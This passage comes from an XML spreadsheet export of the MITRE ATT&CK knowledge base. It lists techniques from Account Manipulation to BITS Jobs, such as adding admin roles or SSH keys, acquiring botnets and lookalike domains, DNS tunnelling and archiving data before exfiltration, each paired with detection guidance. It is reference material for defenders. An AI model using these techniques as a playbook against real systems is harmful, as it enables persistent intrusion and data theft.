    <t>Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian; Tim MalcomVetter</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Account Manipulation: Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>19 January 2020</t>
  </si>
  <si>
    <t>24 March 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Office 365</t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/001</t>
  </si>
  <si>
    <t>08 March 2021</t>
  </si>
  <si>
    <t>Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.</t>
  </si>
  <si>
    <t>Azure AD, IaaS</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Expel; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Account Manipulation: Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/002</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>Account Manipulation: SSH Authorized Keys</t>
  </si>
  <si>
    <t>Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>30 September 2020</t>
  </si>
  <si>
    <t>15 April 2021</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>01 October 2020</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>Acquire Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Vinayak Wadhwa, Lucideus; Wes Hurd</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting)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</si>
  <si>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https://attack.mitre.org/techniques/T1595</t>
  </si>
  <si>
    <t>02 October 2020</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>Active Scanning: Scanning IP Blocks</t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan)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[External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/001</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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</si>
  <si>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Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Active Scanning: Vulnerability Scanning</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>Command And Control</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</si>
  <si>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</si>
  <si>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T1071.004</t>
  </si>
  <si>
    <t>Application Layer Protocol: DNS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>15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</si>
  <si>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DNS traffic to/from known-bad or suspicious domains.</t>
  </si>
  <si>
    <t>Jan Petrov, Citi</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>Application Layer Protocol: File Transfer Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>21 August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</si>
  <si>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used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Application Layer Protocol: Mail Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/001</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</si>
  <si>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
Monitor for web traffic to/from known-bad or suspicious domains. </t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>20 February 2020</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Archival software and archived files can be detected in many ways. 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A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.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</si>
  <si>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 Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Custom Method</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>
    <t>File: File Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Library</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>Monitor processes for accesses to known archival libraries.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</si>
  <si>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T1560.001</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1123</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</si>
  <si>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microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior.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</si>
  <si>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Script: Script Execution</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution</t>
  </si>
  <si>
    <t>ExtraHop</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Automated Exfiltration: Traffic Duplication</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
